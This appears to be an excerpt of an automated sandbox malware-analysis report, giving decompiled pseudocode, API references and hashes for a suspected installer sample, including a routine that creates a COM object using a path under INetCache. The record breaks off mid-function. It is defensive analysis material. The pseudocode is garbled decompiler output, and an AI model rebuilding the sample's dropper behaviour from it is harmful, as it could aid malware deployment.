									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000000.00000002.1615522469.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1615494568.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615549663.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1615572232.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_64Tgzu2FKh.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405B94( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084dc, _t83, 1, 0x4084cc, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x00402107
0x00402111
0x0040211b
0x00402125
0x00402130
0x00402133
0x0040214d
0x00402150
0x00402156
0x00402159
0x00402163
0x00402167
0x00402167
0x0040216c
0x0040217d
0x00402185
0x0040223c
0x0040223c
0x00402243
0x0040218b
0x0040218b
0x0040219a
0x0040219e
0x004021a1
0x004021a7
0x004021b5
0x004021b8
0x004021ba
0x004021c5
0x004021c5
0x004021ca
0x004021cc
0x004021d3
0x004021d3
0x004021d6
0x004021df
0x004021e2
0x004021e8
0x004021ea
0x004021f4
0x004021f4
0x004021f7
0x00402200
0x00402203
0x0040220c
0x00402212
0x00402214
0x00402222
0x00402222
0x00402225
0x0040222b
0x0040222b
0x0040222e
0x00402234
0x0040223a
0x0040224f
0x00000000
0x00000000
0x00000000
0x0040223a
0x00402245
0x00402ac2
0x00402ace

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 004021BD

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth
API String ID: 542301482-3690038070
Opcode ID: 6a73a02503d44bb31e679befed85152b1616c559738105c0cf9dadfb40333c17
Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
Opcode Fuzzy Hash: 6a73a02503d44bb31e679befed85152b1616c559738105c0cf9dadfb40333c17
Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E00406193( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E0040624C();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040287a
0x00402895
0x004028a0
0x004028a1
0x004029db
0x0040287c
0x0040287f
0x00402882
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 4dcabbf17ade67e2922ca78fe286c3d9ba2f9d985751f28a6fa0d9db42db9f20
Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
Opcode Fuzzy Hash: 4dcabbf17ade67e2922ca78fe286c3d9ba2f9d985751f28a6fa0d9db42db9f20
Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040437E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040437E(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216b4 =  *0x4216b4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404248(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
